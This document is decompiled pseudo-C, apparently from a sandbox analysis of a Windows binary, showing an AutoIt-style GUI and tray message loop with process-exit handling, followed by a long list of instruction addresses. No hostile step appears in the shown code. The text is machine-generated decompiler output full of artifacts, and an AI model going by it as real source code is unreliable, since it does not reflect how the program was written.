								if(_t533[0x119] == 1) {
									goto L14;
								}
								__eflags =  *0x4a8668 - 1;
								if( *0x4a8668 == 1) {
									goto L14;
								}
								E0044C29D( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t302 = E0045178A(0x4a8630, _t511);
									__eflags = _t302;
									if(_t302 == 0) {
										break;
									}
									__eflags = E00436565( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t307 = E00465124( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
									__eflags = _t307;
									if(_t307 == 0) {
										continue;
									}
									_v300 = 0;
									_v292 = 1;
									_v288 = 0;
									E00408F40(1,  &_v300);
									_v292 = 1;
									_v300 = _v244.hwnd;
									E00401B10(L"@GUI_CTRLID",  &_v96, __eflags);
									E00401980(2, 1,  &_v300,  &_v96);
									E00402250( &_v96);
									E00408F40(L"@GUI_CTRLID",  &_v300);
									_v292 = 7;
									_v300 = _v244.pt;
									E00401B10(L"@GUI_WINHANDLE",  &_v64, __eflags);
									E00401980(2, 1,  &_v300,  &_v64);
									E00402250( &_v64);
									E00408F40(L"@GUI_WINHANDLE",  &_v300);
									_t536 = L"@GUI_CTRLHANDLE";
									_t559 =  &_v48;
									_v292 = 7;
									_v300 = _v220;
									E00401B10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
									_t511 =  &_v300;
									E00401980(2, 1, _t511,  &_v48);
									E00402250( &_v48);
									_t560 = _v312;
									 *((char*)(_t560 + 0x464)) = 1;
									E0047D33E(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
									 *((char*)(_t560 + 0x464)) = 0;
									_t553 =  &_v316;
									L108:
									E00408F40(_t536, _t553);
									_t471 =  &(_v244.message);
									E00402250( &(_v244.message));
									_t533 = _v312;
									goto L29;
								}
								_t471 =  &(_v244.message);
								E00402250( &(_v244.message));
							}
							L14:
							if(E004091B0(_t511, _t606, _t533) == 1) {
								goto L29;
							}
							if( *0x4a87b0 != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L16;
								}
								E0044C29D( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t437 = E00453BC6(0x4a8710, _t511);
									__eflags = _t437;
									if(_t437 == 0) {
										break;
									}
									__eflags = E00436565( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t442 = E00465124( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
									__eflags = _t442;
									if(_t442 == 0) {
										continue;
									}
									_v204 = 0;
									_v196 = 1;
									_v192 = 0;
									E00408F40(1,  &_v204);
									_v196 = 1;
									_t536 = L"@TRAY_ID";
									_v204 = _v244.hwnd;
									E00401B10(L"@TRAY_ID",  &_v80, __eflags);
									_t511 =  &_v204;
									E00401980(2, 1, _t511,  &_v80);
									E00402250( &_v80);
									_t552 = _v312;
									__eflags = _v188.pt + 1;
									_t552[0x119] = 1;
									E0047D33E(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
									_t552[0x119] = 0;
									_t553 =  &_v220;
									goto L108;
								}
								_t471 =  &(_v244.message);
								E00402250( &(_v244.message));
							}
							L16:
							_t358 = _t533[0x3e];
							if(_t358 == 7) {
								_t511 = _t533[0x114];
								_t359 = WaitForSingleObject(_t511, 0xa);
								_v256 = _t359;
								__eflags = _t359 - 0x102;
								if(_t359 != 0x102) {
									GetExitCodeProcess(_t533[0x114],  &_v256);
									_t511 = _t533[0x114];
									CloseHandle(_t511);
									_v324 = _v256;
									_t471 = _t533 +  *_t533->message;
									E0040D410( &_v324, _t533 +  *_t533->message);
									_t533[0x51] = 1;
									_t533[0x3e] = 0;
								}
								goto L29;
							}
							if(_t358 == 8 || _t358 == 9) {
								Sleep(0xa);
								__eflags = _t533[0x112];
								if(_t533[0x112] == 0) {
									__eflags = 0;
									L127:
									_t511 = _t533[0x10e];
									_t471 =  &_v304;
									E00443D19(_t511,  &_v304,  &_v329);
									_t572 =  &(_t572[3]);
									__eflags = _t533[0x3e] - 9;
									if(_t533[0x3e] != 9) {
										__eflags = _v329 - 1;
										if(_v329 != 1) {
											goto L29;
										}
										_t462 = 0;
										__eflags = 0;
										L133:
										_t368 = _t533[0x115];
										_v260 = 0xcccccccc;
										__eflags = _t368 - _t462;
										if(_t368 != _t462) {
											GetExitCodeProcess(_t368,  &_v260);
											CloseHandle(_t533[0x115]);
											_t533[0x115] = _t462;
										}
										__eflags = _t533[0x3e] - 8;
										if(_t533[0x3e] != 8) {
											_t511 =  *_t533;
											_t471 = _v260;
											__eflags = _t533 + _t511->message;
											E00403CD0(_t533 + _t511->message, _v260, _t462);
										} else {
											asm("fild dword [esp+0x2c]");
											__eflags = _v304;
											if(_v304 < 0) {
												_t606 = _t606 +  *0x48cd18;
											}
											_t511 =  *_t533;
											_v324 = _t606;
											_t471 =  &_v324;
											E004574B4(_t533 + _t511->message,  &_v324);
										}
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										Sleep(_t533[0xbd]);
										goto L29;
									}
									__eflags = _v329;
									if(_v329 != 0) {
										_v329 = 0;
										goto L29;
									}
									_v329 = 1;
									goto L133;
								}
								_t379 = E0040C620(_t533[0x113]);
								_t462 = 0;
								__eflags = _t511;
								if(__eflags < 0) {
									goto L127;
								}
								if(__eflags > 0) {
									L123:
									_t380 = _t533[0x115];
									__eflags = _t380 - _t462;
									if(_t380 != _t462) {
										CloseHandle(_t380);
										_t533[0x115] = _t462;
									}
									_t511 =  *_t533;
									_t471 = _t533 + _t511->message;
									_v324 = _t462;
									E0040D410( &_v324, _t533 + _t511->message);
									goto L66;
								}
								__eflags = _t379 - _t533[0x112];
								if(_t379 < _t533[0x112]) {
									goto L127;
								}
								goto L123;
							} else {
								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
									Sleep(0xa);
									__eflags = _t533[0xbc];
									if(_t533[0xbc] == 0) {
										L56:
										_t384 = _t533[0x3e];
										__eflags = _t384 - 3;
										if(_t384 < 3) {
											goto L29;
										}
										_t385 = _t384 - 3;
										__eflags = _t385 - 3;
										if(__eflags > 0) {
											goto L29;
										} else {
											switch( *((intOrPtr*)(_t385 * 4 +  &M0042E18D))) {
												case 0:
													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
													goto L149;
												case 1:
													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														goto L150;
													}
													if(__eflags <= 0) {
														goto L153;
													}
													goto L29;
												case 2:
													_t386 = E0046FDBF(__eflags, _t606, _t533);
													L149:
													_t547 = _t386;
													__eflags = _t547;
													if(__eflags >= 0) {
														goto L151;
													}
													goto L150;
												case 3:
													__eax = E0046FDBF(__eflags, __fp0, __edi);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														L150:
														_t511 =  ~_t547;
														E00403C90(_t533 +  *_t533->message, _t511, 0);
														_t471 = _t533 +  *_t533->message;
														_v332 = 0;
														E0040D410( &_v332, _t533 +  *_t533->message);
														__eflags = _t547;
														L151:
														if(__eflags == 0) {
															goto L29;
														}
														__eflags = _t547;
														if(_t547 <= 0) {
															L156:
															_push(_t533[0xbd]);
															_t533[0x51] = 1;
															_t533[0x3e] = 0;
															E004331A2(_t533[0xbd], _t606);
															_t572 =  &(_t572[1]);
															goto L29;
														}
														L153:
														_t389 = _t533[0x3e];
														__eflags = _t389 - 5;
														if(_t389 == 5) {
															L155:
															_v188.hwnd = 0;
															_v188.wParam = 1;
															_v188.lParam = 0;
															E00408F40(_t533,  &_v188);
															_t471 =  *_t533;
															_t511 = _t533 +  *_t533->message;
															__eflags = _t511;
															_v188.wParam = 7;
															_v188 =  *(_t533[0x76]);
															E004731E1( *_t533, _t511,  &_v188, 0);
															E00408F40(_t533,  &_v188);
															goto L156;
														}
														__eflags = _t389 - 3;
														if(_t389 != 3) {
															goto L156;
														}
														goto L155;
													}
													if(__eflags > 0) {
														goto L29;
													}
													goto L153;
											}
										}
										while(1) {
											L58:
											__eflags = _v244.message - 0x12;
											if(_v244.message == 0x12) {
												break;
											}
											_t471 = 0x4a8630;
											_t336 = E0040D150(0x4a8630,  &_v244);
											__eflags = _t336;
											if(_t336 == 0) {
												_t338 = E0040D170(0x4a8630,  &_v244);
												__eflags = _t338;
												if(_t338 == 0) {
													TranslateMessage( &_v244);
													_t471 =  &_v244;
													DispatchMessageW( &_v244);
												}
											}
											_t511 =  &_v244;
											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
											__eflags = _t337;
											if(_t337 == 0) {
												L8:
												if( *0x4974e6 == 1) {
													 *0x4974ec = 0;
													 *0x4974e6 = 0;
													_t533[0x3e] = 1;
												}
												if(_t533[0x3e] == 1) {
													_t471 = _t533 +  *_t533->message;
													_v304 = 0;
													E0040D410( &_v304, _t533 +  *_t533->message);
													goto L30;
												} else {
													goto L10;
												}
											} else {
												continue;
											}
										}
										_t533[0x3f] = 1;
										_t533[0x3e] = 1;
										goto L8;
									}
									_t400 = E0040C620(_t533[0xbe]);
									_t471 = 0;
									__eflags = _t511;
									if(__eflags < 0) {
										goto L56;
									}
									_t462 = 0;
									if(__eflags > 0) {
										L65:
										__eflags = _t533[0x3e] - 2;
										if(_t533[0x3e] != 2) {
											_t471 = _t533 +  *_t533->message;
											_v324 = _t462;
											E0040D410( &_v324, _t533 +  *_t533->message);
										}
										L66:
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										goto L29;
									}
									__eflags = _t400 - _t533[0xbc];
									if(_t400 >= _t533[0xbc]) {
										goto L65;
									}
									goto L56;
								} else {
									_t480 = _a4;
									_t533[0x3d] = _t480;
									_t403 = _t480;
									_t471 = _t480 + 1;
									_a4 = _t480 + 1;
									_t598 = _t403 -  *0x4a90f8; // 0x0
									if(_t598 > 0 || _t403 <= 0) {
										L160:
										_t533[0x3e] = 1;
										goto L29;
									} else {
										_t405 = (_t403 << 4) +  *0x4a912c;
										if(_t405 == 0) {
											goto L160;
										}
										_t549 = _t405;
										_t471 =  *(_t549 + 4);
										_v328 = 0;
										_t511 =  *( *(_t549 + 4));
										_t406 = _t511->wParam;
										if(_t406 != 0) {
											__eflags = _t406 - 0x34;
											if(__eflags != 0) {
												_t407 = _t406 - 1;
												__eflags = _t407 - 0x7e;
												if(_t407 > 0x7e) {
													L166:
													_t511 = _t511->wParam;
													E0045E737(_t606, _t533, 0x1388, _t511);
													goto L29;
												}
												switch( *((intOrPtr*)(( *(_t407 + 0x409614) & 0x000000ff) * 4 +  &M00409600))) {
													case 0:
														__eax = 0;
														__ecx =  &_v164;
														_v164 = 0;
														_v152 = 0;
														__eax =  &_v328;
														__edx = __esi;
														__ebx = __edi;
														_v156 = 1;
														__eax = E00408CC0( &_v328, __ebx, __esi, __fp0,  &_v164);
														__eflags = __eax;
														if(__eax == 0) {
															__edx =  *(__esi + 4);
															__eax = _v328;
															__eax =  *( *(__esi + 4) + _v328 * 4);
															__eflags =  *((short*)(__eax + 8)) - 0x7f;
															if( *((short*)(__eax + 8)) != 0x7f) {
																__ecx =  *((short*)(__eax + 0xa));
																__eax = E0045E737(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
															}
														}
														__esi =  &_v164;
														__eax = E00408F40(__edi, __esi);
														goto L29;
													case 1:
														E00408FC0(_t549, _t606, _t533);
														goto L29;
													case 2:
														__ebx = __edi + 0x488;
														__eax = E00432416(__ebx);
														__eflags = __al;
														if(__al != 0) {
															__eax =  &_v328;
															__eax = E0047FAAE(__fp0, __edi, __esi,  &_v328, __ebx);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx =  *(__esi + 4);
																__edx = _v328;
																__eax =  *( *(__esi + 4) + _v328 * 4);
																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
																__eax = E0045E737(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
															}
														} else {
															__edx =  *((short*)(__edx + 0xa));
															__eax = E0045E737(__fp0, __edi, 0xa7, __edx);
														}
														goto L29;
													case 3:
														goto L29;
													case 4:
														goto L166;
												}
											}
											_t471 =  &_v276;
											_v276 = 0;
											_v268 = 1;
											_v264 = 0;
											_t414 = E004096A0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277);
											__eflags = _t414;
											if(_t414 != 0) {
												L37:
												_t564 = _v264;
												__eflags = _t564;
												if(_t564 != 0) {
													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
													_t511 =  *(_t564 + 0xc);
													__eflags = _t511->hwnd;
													if(_t511->hwnd == 0) {
														_push(_t564->i);
														E004111DC();
														_t471 =  *(_t564 + 0xc);
														_push( *(_t564 + 0xc));
														E004111DC();
														_t572 =  &(_t572[2]);
													}
													_push(_t564);
													E004111DC();
													_t572 =  &(_t572[1]);
													_v264 = 0;
												}
												_t415 = _v268;
												__eflags = _t415 - 8;
												if(_t415 == 8) {
													_t565 = _v276;
													__eflags = _t565;
													if(_t565 != 0) {
														__imp__#9(_t565);
														_push(_t565);
														E004111DC();
														_t572 =  &(_t572[1]);
													}
												} else {
													__eflags = _t415 - 0xa;
													if(_t415 == 0xa) {
														_t417 = _v276;
														__eflags = _t417;
														if(_t417 != 0) {
															E0044318E(_t417);
														}
													} else {
														__eflags = _t415 - 5;
														if(_t415 == 5) {
															E0040E270( &_v276, _t564);
														} else {
															__eflags = _t415 - 0xb;
															if(_t415 == 0xb) {
																_t566 = _v276;
																_t511 =  *(_t566 + 4);
																_push(_t511);
																E004111DC();
																_push(_t566);
																E004111DC();
																_t572 =  &(_t572[2]);
															} else {
																__eflags = _t415 - 0xc;
																if(_t415 == 0xc) {
																	_t423 = _v276;
																	__eflags = _t423;
																	if(_t423 != 0) {
																		E0044B3D9(_t423);
																	}
																}
															}
														}
													}
												}
												goto L29;
											}
											_t511 =  *(_t549 + 4);
											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
											if( *((short*)(_t431 + 8)) != 0x7f) {
												_t471 =  *((short*)(_t431 + 0xa));
												E0045E737(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
												E00408F40(_t533,  &_v288);
												goto L29;
											}
											goto L37;
										} else {
											E0040AFA0(_t606, _t533, _t549,  &_a4); // executed
											goto L29;
										}
									}
								}
							}
						}
						if( *0x4a8668 != 0) {
							__eflags = _t533[0x3e];
							if(_t533[0x3e] == 0) {
								goto L10;
							}
						}
						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
							goto L58;
						}
						goto L8;
					}
					goto L30;
				}
			}












































































































                                  0x004091e0
                                  0x004091e0
                                  0x004091e0
                                  0x004091e6
                                  0x004091ef
                                  0x004091f1
                                  0x004091fc
                                  0x0042d7b5
                                  0x0042d7bc
                                  0x0042d7c1
                                  0x004093a5
                                  0x004093ab
                                  0x004093ab
                                  0x00409202
                                  0x00409203
                                  0x00409207
                                  0x00409210
                                  0x00409582
                                  0x00409582
                                  0x0040921d
                                  0x00409224
                                  0x00409386
                                  0x00409386
                                  0x0040938c
                                  0x00409396
                                  0x004095ad
                                  0x004095b2
                                  0x004095b9
                                  0x00000000
                                  0x00000000
                                  0x004095c1
                                  0x004095c8
                                  0x004095d5
                                  0x004095ef
                                  0x004095f1
                                  0x004095f3
                                  0x00000000
                                  0x00000000
                                  0x0042e158
                                  0x0042e160
                                  0x0042e16e
                                  0x0042e182
                                  0x0042e184
                                  0x0042e184
                                  0x00000000
                                  0x0040939c
                                  0x0040939d
                                  0x004093a3
                                  0x004093a3
                                  0x00000000
                                  0x004093a3
                                  0x00409230
                                  0x00409230
                                  0x00409244
                                  0x0040928a
                                  0x00409291
                                  0x0042d810
                                  0x0042d815
                                  0x0042d817
                                  0x0042d81c
                                  0x0042d822
                                  0x0042d824
                                  0x0042d826
                                  0x0042d853
                                  0x0042d853
                                  0x0042d855
                                  0x00000000
                                  0x00000000
                                  0x0042d888
                                  0x0042d88d
                                  0x0042d89c
                                  0x0042d8a7
                                  0x0042d8ab
                                  0x0042d8b6
                                  0x00409379
                                  0x00409380
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409380
                                  0x0042d82c
                                  0x0042d832
                                  0x0042d832
                                  0x0042d834
                                  0x0042d837
                                  0x00000000
                                  0x00000000
                                  0x0042d83d
                                  0x0042d83f
                                  0x0042d841
                                  0x00000000
                                  0x00000000
                                  0x0042d847
                                  0x0042d847
                                  0x0042d848
                                  0x0042d84b
                                  0x0042d84b
                                  0x00000000
                                  0x0042d832
                                  0x00409297
                                  0x0040929e
                                  0x0042d8c0
                                  0x0042d8c7
                                  0x00000000
                                  0x00000000
                                  0x0042d8cf
                                  0x00000000
                                  0x0042d8cf
                                  0x004092a4
                                  0x004092ab
                                  0x0042d8da
                                  0x0042d8e1
                                  0x00000000
                                  0x00000000
                                  0x0042d8e7
                                  0x0042d8ed
                                  0x0042d8f4
                                  0x0042d8fc
                                  0x0042d900
                                  0x0042d901
                                  0x0042d905
                                  0x0042d90d
                                  0x0042d912
                                  0x0042d914
                                  0x00000000
                                  0x00000000
                                  0x0042d91a
                                  0x0042d91c
                                  0x0042d920
                                  0x0042d9a4
                                  0x0042d9a4
                                  0x0042d9ae
                                  0x0042d9b3
                                  0x00000000
                                  0x0042d9b3
                                  0x0042d929
                                  0x0042d92d
                                  0x0042d932
                                  0x0042d934
                                  0x00000000
                                  0x00000000
                                  0x0042d93a
                                  0x0042d94d
                                  0x0042d94d
                                  0x0042d959
                                  0x0042d97f
                                  0x0042d98c
                                  0x0042d98c
                                  0x0042d991
                                  0x0042d995
                                  0x0042d999
                                  0x0042d9a0
                                  0x00000000
                                  0x0042d9a0
                                  0x0042d944
                                  0x0042d947
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042d947
                                  0x0042d9bc
                                  0x0042d9bc
                                  0x0042d9c2
                                  0x0042d9c6
                                  0x0042d9c6
                                  0x0042d9c7
                                  0x0042d9cb
                                  0x0042d9d3
                                  0x0042d9d8
                                  0x0042d9da
                                  0x00000000
                                  0x00000000
                                  0x0042d9e0
                                  0x0042d9e4
                                  0x0042d9e6
                                  0x0042d9ea
                                  0x0042da0d
                                  0x0042d9bc
                                  0x0042d9c2
                                  0x00000000
                                  0x0042d9c2
                                  0x0042d9f0
                                  0x0042d9f5
                                  0x0042d9fa
                                  0x0042d9fa
                                  0x0042da14
                                  0x0042da19
                                  0x0042da20
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042da26
                                  0x0042d9bc
                                  0x004092b1
                                  0x004092b8
                                  0x0042da2b
                                  0x0042da32
                                  0x00000000
                                  0x00000000
                                  0x0042da38
                                  0x0042da3f
                                  0x00000000
                                  0x00000000
                                  0x0042da4a
                                  0x0042da4f
                                  0x0042da4f
                                  0x0042da59
                                  0x0042da5e
                                  0x0042da60
                                  0x00000000
                                  0x00000000
                                  0x0042da70
                                  0x0042da72
                                  0x00000000
                                  0x00000000
                                  0x0042da9a
                                  0x0042da9f
                                  0x0042daa1
                                  0x00000000
                                  0x00000000
                                  0x0042daae
                                  0x0042dab2
                                  0x0042dab6
                                  0x0042daba
                                  0x0042dac3
                                  0x0042dad3
                                  0x0042dad7
                                  0x0042dae6
                                  0x0042daed
                                  0x0042daf6
                                  0x0042db0b
                                  0x0042db13
                                  0x0042db17
                                  0x0042db26
                                  0x0042db2d
                                  0x0042db36
                                  0x0042db42
                                  0x0042db47
                                  0x0042db4e
                                  0x0042db56
                                  0x0042db5a
                                  0x0042db65
                                  0x0042db69
                                  0x0042db70
                                  0x0042db7c
                                  0x0042db86
                                  0x0042db8d
                                  0x0042db92
                                  0x0042db98
                                  0x0042dc2f
                                  0x0042dc2f
                                  0x0042dc34
                                  0x0042dc38
                                  0x0042dc3d
                                  0x00000000
                                  0x0042dc3d
                                  0x0042dc46
                                  0x0042dc4a
                                  0x0042dc4a
                                  0x004092be
                                  0x004092c6
                                  0x00000000
                                  0x00000000
                                  0x004092d3
                                  0x0042dc54
                                  0x0042dc5b
                                  0x00000000
                                  0x00000000
                                  0x0042dc66
                                  0x0042dc6b
                                  0x0042dc6b
                                  0x0042dc75
                                  0x0042dc7a
                                  0x0042dc7c
                                  0x00000000
                                  0x00000000
                                  0x0042dc8c
                                  0x0042dc8e
                                  0x00000000
                                  0x00000000
                                  0x0042dcb6
                                  0x0042dcbb
                                  0x0042dcbd
                                  0x00000000
                                  0x00000000
                                  0x0042dbaf
                                  0x0042dbb6
                                  0x0042dbbd
                                  0x0042dbc4
                                  0x0042dbcd
                                  0x0042dbd4
                                  0x0042dbe0
                                  0x0042dbe7
                                  0x0042dbf2
                                  0x0042dbf9
                                  0x0042dc00
                                  0x0042dc0c
                                  0x0042dc13
                                  0x0042dc16
                                  0x0042dc1d
                                  0x0042dc22
                                  0x0042dc28
                                  0x00000000
                                  0x0042dc28
                                  0x0042dcc4
                                  0x0042dcc8
                                  0x0042dcc8
                                  0x004092d9
                                  0x004092d9
                                  0x004092e2
                                  0x0042dcd2
                                  0x0042dcdb
                                  0x0042dce1
                                  0x0042dce5
                                  0x0042dcea
                                  0x0042dcfc
                                  0x0042dd02
                                  0x0042dd09
                                  0x0042dd18
                                  0x0042dd1c
                                  0x0042dd22
                                  0x0042dd27
                                  0x0042dd2e
                                  0x0042dd2e
                                  0x00000000
                                  0x0042dcea
                                  0x004092eb
                                  0x0042dd3f
                                  0x0042dd45
                                  0x0042dd4c
                                  0x0042ddaf
                                  0x0042ddb1
                                  0x0042ddb1
                                  0x0042ddbc
                                  0x0042ddc2
                                  0x0042ddc7
                                  0x0042ddca
                                  0x0042ddd1
                                  0x0042ddf6
                                  0x0042ddfb
                                  0x00000000
                                  0x00000000
                                  0x0042de01
                                  0x0042de01
                                  0x0042de03
                                  0x0042de03
                                  0x0042de09
                                  0x0042de11
                                  0x0042de13
                                  0x0042de1f
                                  0x0042de2c
                                  0x0042de32
                                  0x0042de32
                                  0x0042de38
                                  0x0042de3f
                                  0x0042de76
                                  0x0042de78
                                  0x0042de81
                                  0x0042de83
                                  0x0042de45
                                  0x0042de49
                                  0x0042de4d
                                  0x0042de4f
                                  0x0042de55
                                  0x0042de55
                                  0x0042de5b
                                  0x0042de5d
                                  0x0042de64
                                  0x0042de6c
                                  0x0042de6c
                                  0x0042de8f
                                  0x0042de96
                                  0x0042de9c
                                  0x00000000
                                  0x0042de9c
                                  0x0042ddd7
                                  0x0042dddc
                                  0x0042ddec
                                  0x00000000
                                  0x0042ddec
                                  0x0042dde2
                                  0x00000000
                                  0x0042dde2
                                  0x0042dd58
                                  0x0042dd5f
                                  0x0042dd61
                                  0x0042dd63
                                  0x00000000
                                  0x00000000
                                  0x0042dd69
                                  0x0042dd7b
                                  0x0042dd7b
                                  0x0042dd81
                                  0x0042dd83
                                  0x0042dd8a
                                  0x0042dd90
                                  0x0042dd90
                                  0x0042dd96
                                  0x0042dd9b
                                  0x0042dda1
                                  0x0042dda5
                                  0x00000000
                                  0x0042dda5
                                  0x0042dd6f
                                  0x0042dd75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004092fa
                                  0x004092fd
                                  0x004094d1
                                  0x004094d7
                                  0x004094de
                                  0x00409505
                                  0x00409505
                                  0x0040950b
                                  0x0040950e
                                  0x00000000
                                  0x00000000
                                  0x0042dec0
                                  0x0042dec3
                                  0x0042dec6
                                  0x00000000
                                  0x0042decc
                                  0x0042decc
                                  0x00000000
                                  0x0042defc
                                  0x00000000
                                  0x00000000
                                  0x0042dfdc
                                  0x0042dfe1
                                  0x0042dfe3
                                  0x0042dfe5
                                  0x00000000
                                  0x00000000
                                  0x0042dfeb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042ded4
                                  0x0042df01
                                  0x0042df01
                                  0x0042df03
                                  0x0042df05
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042dedf
                                  0x0042dee4
                                  0x0042dee6
                                  0x0042dee8
                                  0x0042df0b
                                  0x0042df14
                                  0x0042df19
                                  0x0042df23
                                  0x0042df29
                                  0x0042df31
                                  0x0042df36
                                  0x0042df38
                                  0x0042df38
                                  0x00000000
                                  0x00000000
                                  0x0042df3e
                                  0x0042df40
                                  0x0042dfb4
                                  0x0042dfba
                                  0x0042dfbb
                                  0x0042dfc2
                                  0x0042dfcc
                                  0x0042dfd1
                                  0x00000000
                                  0x0042dfd1
                                  0x0042df46
                                  0x0042df46
                                  0x0042df4c
                                  0x0042df4f
                                  0x0042df5e
                                  0x0042df6f
                                  0x0042df76
                                  0x0042df81
                                  0x0042df88
                                  0x0042df8d
                                  0x0042df95
                                  0x0042df95
                                  0x0042df98
                                  0x0042dfa3
                                  0x0042dfaa
                                  0x0042dfaf
                                  0x00000000
                                  0x0042dfaf
                                  0x0042df55
                                  0x0042df58
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042df58
                                  0x0042deee
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042decc
                                  0x00409520
                                  0x00409520
                                  0x00409520
                                  0x00409525
                                  0x00000000
                                  0x00000000
                                  0x00409530
                                  0x00409535
                                  0x0040953a
                                  0x0040953c
                                  0x00409548
                                  0x0040954d
                                  0x0040954f
                                  0x00409556
                                  0x0040955c
                                  0x00409561
                                  0x00409561
                                  0x0040954f
                                  0x0040956f
                                  0x00409574
                                  0x00409576
                                  0x00409578
                                  0x00409270
                                  0x00409277
                                  0x0042d7f3
                                  0x0042d7fa
                                  0x0042d801
                                  0x0042d801
                                  0x00409284
                                  0x0042e140
                                  0x0042e146
                                  0x0042e14e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040957e
                                  0x00000000
                                  0x0040957e
                                  0x00409578
                                  0x0042d7dd
                                  0x0042d7e4
                                  0x00000000
                                  0x0042d7e4
                                  0x004094e6
                                  0x004094eb
                                  0x004094ed
                                  0x004094ef
                                  0x00000000
                                  0x00000000
                                  0x004094f1
                                  0x004094f3
                                  0x0040958c
                                  0x0040958c
                                  0x00409593
                                  0x0042deac
                                  0x0042deb2
                                  0x0042deb6
                                  0x0042deb6
                                  0x00409599
                                  0x00409599
                                  0x004095a0
                                  0x00000000
                                  0x004095a0
                                  0x004094f9
                                  0x004094ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409327
                                  0x00409327
                                  0x0040932a
                                  0x00409330
                                  0x00409332
                                  0x00409333
                                  0x00409336
                                  0x0040933c
                                  0x0042dff6
                                  0x0042dff6
                                  0x00000000
                                  0x0040934a
                                  0x0040934d
                                  0x00409353
                                  0x00000000
                                  0x00000000
                                  0x00409359
                                  0x0040935b
                                  0x00409360
                                  0x00409364
                                  0x00409366
                                  0x0040936c
                                  0x004093ae
                                  0x004093b1
                                  0x00409450
                                  0x00409451
                                  0x00409454
                                  0x0042e074
                                  0x0042e074
                                  0x0042e07f
                                  0x00000000
                                  0x0042e07f
                                  0x00409461
                                  0x00000000
                                  0x00409475
                                  0x00409477
                                  0x0040947e
                                  0x00409485
                                  0x0040948d
                                  0x00409491
                                  0x00409493
                                  0x00409495
                                  0x004094a0
                                  0x004094a5
                                  0x004094a7
                                  0x004094a9
                                  0x004094ac
                                  0x004094b0
                                  0x004094b3
                                  0x004094b8
                                  0x0042e005
                                  0x0042e00d
                                  0x0042e00d
                                  0x004094b8
                                  0x004094be
                                  0x004094c5
                                  0x00000000
                                  0x00000000
                                  0x0040946b
                                  0x00000000
                                  0x00000000
                                  0x0042e017
                                  0x0042e01e
                                  0x0042e023
                                  0x0042e025
                                  0x0042e041
                                  0x0042e048
                                  0x0042e04d
                                  0x0042e04f
                                  0x0042e055
                                  0x0042e058
                                  0x0042e05c
                                  0x0042e05f
                                  0x0042e06a
                                  0x0042e06a
                                  0x0042e02b
                                  0x0042e02b
                                  0x0042e036
                                  0x0042e036
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409461
                                  0x004093bc
                                  0x004093c7
                                  0x004093cb
                                  0x004093d3
                                  0x004093d7
                                  0x004093dc
                                  0x004093de
                                  0x004093f5
                                  0x004093f5
                                  0x004093f9
                                  0x004093fb
                                  0x00409400
                                  0x00409402
                                  0x00409405
                                  0x00409407
                                  0x0042e0a6
                                  0x0042e0a7
                                  0x0042e0ac
                                  0x0042e0b2
                                  0x0042e0b3
                                  0x0042e0b8
                                  0x0042e0b8
                                  0x0040940d
                                  0x0040940e
                                  0x00409413
                                  0x00409416
                                  0x00409416
                                  0x0040941a
                                  0x0040941e
                                  0x00409421
                                  0x0042e0c0
                                  0x0042e0c4
                                  0x0042e0c6
                                  0x0042e0cd
                                  0x0042e0d3
                                  0x0042e0d4
                                  0x0042e0d9
                                  0x0042e0d9
                                  0x00409427
                                  0x00409427
                                  0x0040942a
                                  0x0042e0e1
                                  0x0042e0e5
                                  0x0042e0e7
                                  0x0042e0ee
                                  0x0042e0ee
                                  0x00409430
                                  0x00409430
                                  0x00409433
                                  0x0042e0fc
                                  0x00409439
                                  0x00409439
                                  0x0040943c
                                  0x0042e106
                                  0x0042e10a
                                  0x0042e10d
                                  0x0042e10e
                                  0x0042e116
                                  0x0042e117
                                  0x0042e11c
                                  0x00409442
                                  0x00409442
                                  0x00409445
                                  0x0042e124
                                  0x0042e128
                                  0x0042e12a
                                  0x0042e131
                                  0x0042e131
                                  0x0042e12a
                                  0x00409445
                                  0x0040943c
                                  0x00409433
                                  0x0040942a
                                  0x00000000
                                  0x00409421
                                  0x004093e0
                                  0x004093e7
                                  0x004093ea
                                  0x004093ef
